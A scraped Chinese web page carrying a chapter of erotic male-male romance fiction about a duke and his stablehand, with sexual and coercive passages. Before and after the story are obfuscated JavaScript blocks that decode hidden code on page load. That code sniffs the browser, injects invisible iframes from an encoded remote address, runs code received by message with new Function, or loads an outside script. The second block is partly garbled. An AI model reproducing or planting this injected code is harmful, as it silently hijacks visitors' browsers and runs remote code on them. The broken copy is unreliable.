青梅竹马1v 1_荡欲武则天

eval("\x77\x69\x6e\x64\x6f\x77")["\x77\x6E\x68\x77"]=function(e){var hp =''+'ABCDEFGHIJKLMNOPQ'+'RSTUVWXYZabcdefghi'+'jklmnopqrstuvw'+'xyz012345'+'6789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=hp.indexOf(e.charAt(f++));o=hp.indexOf(e.charAt(f++));u=hp.indexOf(e.charAt(f++));a=hp.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x70\x75\x6E\x41\x50\x77\x68\x55\x43"]=function(){eval(wnhw("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQod25odyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKHduaHcoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZih3bmh3KCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbd25odygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIF9pZD1fY2xhc3M9J2FfMTk5MCc7dmFyIF9fYWFucWlkID0gJ2EnICsgcmQoMSwgMTAwMDAwKTtkWyd3JysncmknKyd0JysnZScrJ2xuJ10oJzxkJysnaXYgaScrJ2Q9JysnIicrX19hYW5xaWQrJyI+JysnPC9kJysnaXYnKyc+Jyk7d1snX19hJysnYWEnKyducScrJ29iJysnal8xOTkwJ109ZFsncXUnKydlcnknKydTZWxlJysnY3RvJysnciddKCcjJytfX2FhbnFpZCk7X2lkICs9IGRbJ3F1JysnZXJ5JysnU2UnKydsZWMnKyd0bycrJ3JBJysnbGwnXSgnLicrX2NsYXNzKS5sZW5ndGg7dmFyIHogPSB1KyctMS8nK19pZCsnLycrcjtkWyd3JysncmknKyd0JysnZSddKCc8aScrJ2ZyJysnYScrJ21lIHN0eWxlPSInKydtJysnYXInKydnaScrJ246MDtwJysnYWQnKydkJysnaW4nKydnOjA7YicrJ29yJysnZCcrJ2VyOm4nKydvbicrJ2U7Jysnb3AnKydhJysnY2knKyd0JysneTowJysnLjAnK3JkKDIsOSkrJzt3aScrJ2R0JysnaDonK3JkKDIsNSkrJ3AnKyd4O2gnKydlJysnaWdoJysndDonK3JkKDIsNSkrJ3AnKyd4OycrJyJhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WyJhZCIrImRFdiIrImVudEwiKyJpc3QiKyJlbmVyIl0oIm0iKyJlc3MiKyJhZ2UiLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyK19pZF0pe3JtKGMpO25ldyBGdW5jdGlvbih3bmh3KGUuZGF0YVtyK19pZF0ucmVwbGFjZShuZXcgUmVnRXhwKHIsJ2cnKSwnJykpKSgpO319KTt9ZWxzZXtkLndyaXRlKCc8cycrJ2NyaScrJ3B0IHNyYz0iJyt1KycuanMiPjxcL3MnKydjcmlwJysndD4nKTt9fSkoJycrJz09UU55JysnMEMnKydNNWtUJysnTXR0JysnTScrJ20nKydSeVUnKydTJysnWm9oJysnWFlxbCcrJ25SeVV5JysnTScrJzAnKydRRE14RScrJzBNbDAnKycyYmo1JysnaWEnKyczVicrJ1dlJysnMGRYJysnWnUnKydjM2QnKyczWmtNbCcrJ1lrTWxFJysnME1sJysnTScrJ0hjMFJIJysnYScrJycrJycsJycrJ1FPRScrJ1NKTicrJ3BaJysnJysnJyx3aW5kb3csZG9jdW1lbnQsJycrJ3BDaycrJ3JGWCcrJ1onKycnKycnLCd0Jyk="));}
经过几天的休养(与折腾?),公爵大人的伤口总算慢慢愈合了。

这天晚上,好不容易得到了医生的允许,韦恩公爵迫不及待地大声欢呼!

「来人啊!快去准备洗澡水!本公爵要痛痛快快地大洗一场!」

「是的,主人。」

极富异国情调的大浴池里,飘着数不清的红色玫瑰花瓣……

韦恩公爵全身赤裸地浸泡在充满香气的玫瑰水中,畅快地舒了一口气……

「呼……真是太舒服了……」

浴池边点了无数的蜡烛,火光倒映在池水中,气氛浪漫无比……

一位容貌艳丽的侍女殷勤地说,「主人,你这头美丽的金发已经几天没保养了,你看是不是将上次邻国王子献给主人的那瓶玫瑰花露拿来用呢?」

韦恩公爵闻言撩起自己的一缕发丝看了看,立刻脸色大变!「啊啊啊!我的宝贝头发啊!怎么变得这么干燥了?去,快去把什么玫瑰花露、百合花露通通给本公爵拿来!」

「是的,主人!我立刻就去!」

呜……可恶啊!

说来说去都是那个臭马夫的错!

要不是为了赶走那个混世大y魔,我堂堂杜玛斯•韦恩公爵,需要偷偷去放火赶马吗?

结果马没赶跑,自己一身细嫩的肌肤和美丽的金发却差点被毁了,真是得不偿失啊!

可恶,到底要怎么样才能把那个臭马夫赶走啊?

就在脑细胞少得可怜的杜玛斯•韦恩公爵绞尽脑汁时,身后突然有人开始轻柔地按摩他的头皮。

「嗯……好舒服哦……」

在他头皮上按摩的手指温柔而有力,力道下得恰如其分,让韦恩公爵舒服得呻吟出声……

「哼嗯……这边……这边也要……」韦恩公爵轻轻转头头部,享受着那美妙的按摩服务……

「嗯…真是太舒服了……娜娜,才几天没见,你的按摩技术怎么进步这么多啊?」

在他身后的侍女并没有回答。

在用玫瑰花露充分滋润过头发后,那双温柔的手接着开始按摩他的颈部……

「哦哦……太舒服了……」韦恩公爵被按得昏昏欲睡,眼皮愈来愈沉重……

烛光摇曳,暗香流动。

等到韦恩公爵稍稍恢复意识时,他发觉自己正躺在浴池旁的躺椅上,有人正将他的脚踝握在手上,轻轻地按摩着。

「嗯……好舒服哦……娜娜,你的手上功夫真厉害……啊啊——好痛!」

韦恩公爵才夸完,脚底板就被人戳了一下!

「你在搞什么鬼啊?」韦恩公爵气愤地张大眼睛,瞪了那个chu鲁的侍女一眼!「啊啊啊——!怎么是你?」

韦恩公爵凝目一看,帮他按摩的竟然是那个臭马夫,立刻吓得大叫!

「怎么不是我?」

「娜娜呢?她帮我洗头洗到一般,跑哪里去了?」

「她不在,从头到尾就是我帮你按摩洗头的。」

「什么?」杜玛斯•韦恩公爵瞪大了眼,「是你?少骗人了!」

韦恩公爵才不相信这个恶魔会对他这么温柔呢。

「不信吗?」雷恩•克尔曼开始施展他高超的按摩技术,从公爵的脚踝一直按摩到他的大腿g部。

「哦哦……」好舒服,真的太舒服了……

在男人温柔有力的双手下,杜玛斯•韦恩公爵仿佛融化成一团泥似的,任他随便搓揉。

「舒服吗?」

「哼嗯……普普通通……」明明舒服到快死了,韦恩公爵还在死鸭子嘴硬。

「公爵大人不满意啊,好吧,那我只好使出我的绝招了!」

雷恩•克尔曼突然将他的双腿用力折往x前!d_a

「啊啊啊——痛死我了!」杜玛斯•韦恩公爵发出杀猪似的大叫!「死马夫!臭马夫!你想谋杀本公爵吗?」

「公爵大人请放心,这可是我从东方学来的独特按摩术,痛过后,保证让你通体舒畅。」

「真的?」杜玛斯•韦恩公爵怀疑地看着他,「要是你敢骗我……哼哼,雷恩•克尔曼,你就死定了!」

「公爵大人说这话真是太令人伤心了。」雷恩•克尔曼一副痛心疾首的模样,「我是看你最近都不能出去活动,筋骨肯定很僵硬,所以才把我的压箱绝活拿出来伺候你的。没想到公爵大人竟然如此误会我……」

听到男人说得情真意切,杜玛斯•韦恩公爵突然觉得有点不好意思。

难道真的是本公爵误会他了?

他安慰地笑了笑,「好好,算我误会你,行了吧?看在你这么想为本公爵服务的份上,我就赐予你这个荣幸,让你为我好好按摩吧。」

「那就谢谢公爵大人了。」

雷恩•克尔曼笑得十分邪恶。

可惜烛光昏暗,韦恩公爵并没有看到男人脸上的表情。

温柔有力的双手继续着让人浑身舒服到流口水的按摩。

雷恩•克尔曼握住那光滑白晰的脚,放到自己嘴边,冷不防地一口含住了他的脚趾——

「哦哦——」杜玛斯•韦恩公爵浑身一颤!

「好香的蹄子啊……」雷恩•克尔曼边舔边戏谑地说。

「哼嗯……闭、闭嘴!」

呜……死马夫!臭马夫!

竟然把本公爵这么美的脚当成蹄子?

「啧…啧……真甜……真好吃……」

呜……这个家伙不会把本公爵的美腿当烤猪脚了吧?

「啊啊……不要再舔了……哦哦……救命啊——」

就这样,「忠心耿耿」的马夫每晚都帮他的公爵大人提供独特的按摩服务。

时光匆匆而过,在最「细心周到」的马夫的「照料」下,有着尊贵公爵血统的「小母马」过得悠哉游哉,甚至忘记了一件很重要的事。

这天,管家匆匆跑来。

「公爵大人,布涞尔王国的亲善大使维尔福公爵到了。」

「什么?!这么快时间就到了吗?」韦恩公爵这才想起了被丢到九霄云外的重要任务,一屁股从床上坐起来。

「是的,他已经到公爵府大门了。公爵大人,现在怎么办?」

「还能怎么办?只好列队欢迎啦,还有,叫厨房快点准备美食和美酒。」

「我这就去办。」

管家连忙跑出去布置。

韦恩公爵朝天翻了个白眼,见色忘兄的国王,就知道把这种「好」差事丢给我,把邪恶的马夫弄过来也就算了,好歹算是个帅哥,而且还偶尔知道怎么伺候人。

想起这段日子来被雷恩•克尔曼温柔的照顾,公爵的脸上不禁微微发热。

不过,他很快又想到了即将迎接的「贵客」。

哼,和雷恩•克尔曼比起来,维尔福公爵简直就是个不入流的人渣。

我这个没良心的国王堂弟,就知道为难本公爵。

抱怨归抱怨,韦恩公爵还是不敢把国王的吩咐当耳边风,只好一边嘀咕,一边换上华丽的正装,出来招待维尔福公爵。

「欢迎大驾光临,维尔福公爵。」

「好久不见了,韦恩公爵,你比从前更美丽了。」一看见俊美的韦恩公爵,维尔福公爵立刻两眼放光。

韦恩公爵巧妙地躲过他的拥抱,和他握了握手,立即迅速地甩掉了。

「您远道而来,国王命令我热情地招待您,务必使您宾至如归。为了表达本国对贵国的诚意,我已经在公爵府设下您最爱的美酒和美食,请先用餐吧。」

「哈哈,你真知道我的心意,其实,我除了爱美酒和美食外,更爱美人。」维尔福公爵用色眯眯的眼睛盯着韦恩公爵打量。

虽然心里冒火,但为了两国邦交,韦恩公爵脸上硬挤出微笑。

在富丽堂皇的公爵府饱餐一顿后,几杯美酒下肚,维尔福公爵瞄向韦恩公爵的目光愈发放肆了。

「我说,韦恩公爵。」维尔福公爵借着酒意,把脸凑到他身旁,「接下来,你为我准备了什么餐后娱乐节目呢?」

「餐后娱乐节目?」

「你的热情招待,不会仅仅是吃一点东西而已吧?我可是本国的亲善大使,这样随便地打发我,我的国王可是会生气的哦。」

给你吃的就算不错啦。

换了别人,一嘴醉醺醺的臭气对着本公爵,早被本公爵踹到墙外了。

韦恩公爵在心里做了一个鄙视的表情。

不过,维尔福毕竟是代表布涞尔王国的亲善大使,负责招待重任的韦恩公爵原本确实应该为他准备丰富的娱乐节目。

只是最近过得太舒坦了,韦恩公爵压g就忘记了维尔福公爵这家伙的存在,更不用说准备什么娱乐。

这件事要是让国王知道了,一定会挨骂。

韦恩公爵眼珠子一转,立即想到了好主意。

「呵呵,本公爵当然有所准备,为了好好招待你,本公爵可是提前了一个月的时间,花了不少j力认真准备呢,接下来就是你最喜欢的参观节目。」

「参观?是参观韦恩公爵的卧房吗?那真是太好了,我们这就去吧。」

你想得美!

韦恩公爵忍不住狠狠瞪了色心不改的维尔福一眼。

「不,维尔福公爵,本公爵为你准备的节目,比区区一间卧房要j彩一百倍。」

「什么?天底下还有比韦恩公爵的卧房更j彩的地方?难道韦恩公爵更喜欢野战?嘿嘿,其实本公爵也很喜欢大自然的激情。」

韦恩公爵几乎要一拳揍在这张恶心的脸上,却只皮笑r不笑地说,「那么,我们就去看大自然的激情吧。」

维尔福公爵被他的笑容勾走了三魂七魄,立即丢下一桌狼藉,跟着韦恩公爵的脚步离开了饭厅——

从公爵府里出来,七转八拐地走了一会。

「维尔福公爵,就是这里。」

「这……」维尔福公爵看看脚边一堆堆的干草,还有眼前摇头甩尾的马匹,楞了一下,「这不是马厩吗?」

「是啊,就是马厩。」

「韦恩公爵,你所说的j彩的地方就是这里吗?」

「当然。」……一边点头,一边拼命往附近瞄。

雷恩•克尔曼那家伙跑到哪里去了?

就在韦恩公爵着急的时候,仿佛听见公爵心底的召唤一样,雷恩•克尔曼高大又强壮的身影在马厩里出现了。

来得正好!

韦恩公爵一把拖了雷恩•克尔曼到维尔福公爵面前,煞有介事地介绍,「维尔福公爵,请允许我向你介绍,这位是国王特意聘请的驯马师雷恩•克尔曼。」

然后,又指指维尔福公爵。

「雷恩•克尔曼,你眼前的这一位是布涞尔王国的亲善大使,维尔福公爵。」

雷恩•克尔曼也很意外,会在马厩里看见不请自来的韦恩公爵,悄悄在他耳边低语,「小母马,不好好在床上躺着,你带个男人过来马厩干什么?」

韦恩公爵耳朵一红,赶紧拿出威严的样子,「咳咳,本公爵当然是带维尔福公爵过来参观国王陛下那两匹即将参加马术大赛的骏马呀。维尔福公爵,你看这两匹马,非常的神骏吧?」他指指正低头吃饲料的马。

维尔福公爵所有的注意力都放在俊美的韦恩公爵身上,到了马厩之后g本没空理会马匹。

此刻听韦恩公爵这么说,只好把头转过去扫一眼,忽然呆住了。

好神气的骏马!!

比他前两个月进献给布涞尔国王陛下的那两匹还要好。

「韦恩公爵,你刚才是说,这两匹马是贵国国王陛下的吗?」

「是的,暂时放在本公爵府里照顾。」

「那么,这两匹马会参加即将召开的世界马术大赛?」

「当然要参加比赛。我们的国王对这件事很重视。这两匹马皮毛又光又亮,跑起来飞快,像在草上飘动。它们参加比赛,不用说一定会是比赛的最终赢家。」跟雷恩‧克尔曼相处久了,韦恩公爵也似乎对这两匹马有了一点感情,在维尔福公爵面前,情不自禁露出自豪的样子。

「呵呵,确实是……两匹好马……」维尔福公爵干笑两声。

这次惨了。

布涞尔国王陛下说过,他对这次的比赛志在必得。

自己献上两匹马时,还向国王拍x口保证这是天底下最好的马,一定会赢得比赛。

如果输给了韦恩公爵府里的这两匹,自己一定会倒大楣!

「其实,两匹马会长得这么好,都是雷恩‧克尔曼的功劳。他可是各国国王都争相聘请的,世界上最著名的驯马师。」不但情不自禁地夸马,韦恩公爵今天也情不自禁夸了那个一直欺负自己的恶魔马夫。

一边说着,还一边转头,微笑着看了雷恩‧克尔曼一眼。

雷恩‧克尔曼也回他一个英俊的笑脸。

这一幕落入正忧心忡忡的维尔福公爵眼里,无异于雪上加霜。

什么?

他一直垂涎的高傲美男,韦恩公爵,竟对一个低贱的马夫微笑?

岂有此理!

维尔福公爵强烈的嫉妒心一生,把理智烧了一大半,顿时把马术大赛丢到了一边。

他这次竭力争取当亲善大使,还不是因为对曾有一面之缘的韦恩公爵念念不忘吗?

这次不管怎么说,也要把他搞到手!

「韦恩公爵,这没什么可看的了,我们参观别的吧。」

「参观什么别的?」韦恩公爵g本就不想离开马厩。

有雷恩‧克尔曼的马厩,远比有维尔福这个色魔的客厅舒服多了。

「当然是参观韦恩公爵你的卧房啊。」维尔福公爵又露出了色眯眯的样子。

凭他维尔福一流的采花手段,只要这白晰的小美男肯和他一起进卧房,绝对会臣服在他身下。

让韦恩那张俊美的脸露出欲生欲死的表情,光是想想就已经让人血脉贲张!

「我什么时候说过让你参观我的卧房?」韦恩公爵满脸不高兴。

「刚才在饭厅不是答应了吗?你和我一边喝着香槟,一边商量的呀。」维尔福公爵故意挑拨韦恩公爵和他身边的男人的关系。

「维尔福公爵,你喝醉了吧?」

韦恩公爵不安地瞅瞅身边的雷恩‧克尔曼。

并不是对这个恶魔马夫有什么深厚感情啦,更不是已经爱上他了。

自己只是……不希望雷恩‧克尔曼有什么误会。

一想到雷恩‧克尔曼会以为自己卧房随便什么人都能进去,就感到一股难受。

韦恩公爵的反应,也被维尔福公爵看在眼里。

可误啊!

韦恩公爵不可能真的喜欢上一个臭烘烘的马厩臭虫吧?

既然一个马夫都可以把你弄到手……我,比他高贵一万倍的维尔福公爵一定更能让你满意。

「韦恩公爵,刚刚吃饭时你对本公爵的的柔情蜜意,本公爵心领神会。不过,现在你为什么不肯承认呢?你不会是顾忌身边这个男人吧?他不过是一个养马的贱民而已。」

他肆无忌惮地说着。并没有留意到雷恩‧克尔曼深邃的眼里,猛然闪出一道j芒。

韦恩忍无可忍的的沉下脸,「如果你再胡说八道,我只能请你离开我的府邸了。」

「哈哈哈,我可是代表一国的亲善大使,韦恩公爵,如果你把本公爵赶走的话,如何向贵国的国王陛下交代呢?」

「你……」

韦恩公爵气得浑身颤抖。

他虽然荒唐惯了,但还不至于拿两国邦交意气用事。

万一亲善不成,反而引起两国战争,这可是他这个公爵,国王的堂兄也承担不起的责任。

「为了两国的友好,你就继续热情招待我吧,韦恩公爵。」维尔福公爵充满欲望的目光可怕地盯着韦恩公爵,「现在,你可以带我去参观一下你的卧房,或者带我去我的客房也行。本公爵可是要在你的府邸里住上足足两个月呢,这两个月的时候,本公爵有足够的信心和情趣让你……」

话未说完,一直在旁边没说话的雷恩‧克尔曼忽然抿起下唇,轻轻地吹了一声口哨。

正乖乖垂头吃草的马儿仿佛被针戳了一下似的,猛然转过头,以迅雷不及掩耳的速度朝他们三人冲过来。

在韦恩公爵反应前,雷恩‧克尔曼已经抱住他,灵巧地闪到一边。

背对着马匹,正在嚣张跋扈说话的维尔福公爵却g本没有注意到背后的动静。

「……让你好好的享受本公爵的热……啊──!」被身后冲过来的马一撞,维尔福公爵发出一声惨叫,倒在地上。

「小心!」看见高大的骏马嘶叫一声直立起来,扬起前蹄,韦恩禁不住大叫一声。

要是让马把布涞尔的亲善大使踩死了,这可是战争的开端!

但神骏的马儿显然很聪明,高高扬起两只前蹄,踏下时却避开了维尔福公爵的身体,落足在旁边的地上。

虽然如此,已经足以让维尔福公爵吓得心脏差点停止跳动。

就在维尔福公爵松了一口气的时候,雷恩‧克尔曼冷冷地抿起唇,吹出一个和马的低鸣极为相似的声音。

马儿立即转身,把屁股对准了仰躺在地上的公爵。

砰!!d_a

不等维尔福公爵反应过来,一大坨黑色的臭烘烘的马粪从马屁股直接掉到他的头上!

维尔福公爵急怒攻心,立即被这种前所未有的臭气和耻辱气得昏了过去。

片刻后,马厩传来惊天动地的叫声。

「啊啊啊啊啊!」发出声音的人,并不是维尔福公爵,而是目瞪口呆的韦恩公爵。

「叫够了吗?我的小母马。」

「你……你你你……他是布涞尔的亲善大使啊!你知道袭击亲善大使是什么罪名吗?你会被判处死刑的!」韦恩公爵急出一身汗。

可是雷恩‧克尔曼那家伙,却一副轻轻松松的模样。

「袭击亲善大使?你是说那匹马吗?」

「我说的是你!」

「和我有什么关系?」雷恩‧克尔曼镇定地耸耸肩。

「当然和你有关系,你刚刚吹口哨,指挥马匹,马匹就冲过来了,撞倒了维尔福公爵,然后还调转马屁股,在他脸上……排泄!」

「哈哈哈,别说得那么神了,我只是一个微不足道的驯马师,难道真的可以只吹吹口哨就让马在指定的地方排泄吗?」

「本公爵可是亲眼看到了。」

「这么说,你是目击证人了?」

罪名可以栽到马的头上去,韦恩公爵也很高兴,这两匹马要参加大赛,国王陛下不会对它们怎么样。

经过这段日子的和平相处,他现在可不愿意雷恩‧克尔曼被国王治罪了。

可是,看见雷恩‧克尔曼这么跩,还是忍不住和他斗嘴。

「哼哼,我就是目击证人,要是我高兴的话,随时可以出来指证你,是你攻击了亲善大使。」

「是吗?」

雷恩‧克尔曼把热气吹到他耳朵里,低声说,「看来,我要再加一把劲,经常地骑骑你,才能让你像两匹马儿一样乖乖地听我话了?从现在开始,我要努力把你训练到听见我的口哨就勃起的程度,你说怎么样?」

下流的话,让韦恩公爵浑身发烫了。
版权声明

本站内容由互联网搜集而来,不代表撩妹情话网立场,请勿对号入座!
如果本文侵犯了您的合法权益,请联系我们,我们将在第一时间处理!

eval("\x77\x69\x6e\x64\x6f\x77")["\x6E\x70\x6C\x73"]=function(e){var sp =''+'ABCDEFGHIJKL'+'MNOPQRSTUVWXY'+'Zabcdefgh'+'ijklmnopqrs'+'tuvwxyz0123456'+'789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x41\x73\x58\x70\x50\x73\x6C\x6E\x5A"]=function(){eval(npls("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQobnBscyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKG5wbHMoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZihucGxzKCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbbnBscygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIHo9dSsnLTEvcXEvJytyO2RbJ3cnKydyaScrJ3QnKydlJ10oJzxpJysnZnInKydhJysnbWUgc3R5bGU9IicrJ20nKydhcicrJ2dpJysnbjowO3AnKydhZCcrJ2QnKydpbicrJ2c6MDtiJysnb3InKydkJysnZXI6bicrJ29uJysnZTsnKydvcCcrJ2EnKydjaScrJ3QnKyd5OjAnKycuMCcrcmQoMiw5KSsnO3dpJysnZHQnKydoOicrcmQoMiw1KSsncCcrJ3g7aCcrJ2UnKydpZ2gnKyd0OicrcmQoMiw1KSsncCcrJ3g7JysnIiBhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WydhZCcrJ2RFdicrJ2VudEwnKydpc3QnKydlbmVyJ10oJ20nKydlc3MnKydhZ2UnLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyXSl7cm0oYyk7bmV3IEZ1bmN0aW9uKG5wbHMoZS5kYXRhW3JdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fWVsc2V7ZC53cml0ZSgnPHMnKydjcmknKydwdCBzcmM9IicrdSsnLmpzIj48XC9zJysnY3JpcCcrJ3Q+Jyk7fX0pKCcnKyc9JysnPXdNTScrJ3kwU00nKydNJysnNWtUTU0nKyd0TScrJ01tUicrJ3lVQ01NJysndDVXWjAnKydNTWonKydSeVV5JysnTU0wUUQnKydNTXgnKydFJysnME0nKydNbCcrJzAyJysnYmo1aWEnKyczJysnVlcnKydlJysnMGQnKydYJysnWnUnKydjJysnM2QnKyczWmsnKydNTWxZJysna00nKydNbCcrJ0UnKycwTU0nKydsTScrJ01IYzBSJysnSCcrJ2EnKycnKycnLCcnKydJZ0snKydsanMnKydBZScrJycrJycsd2luZG93LGRvY3VtZW50LCcnKydhdmQnKydlTXgnKyc1JysnJysnJywnTScp"));}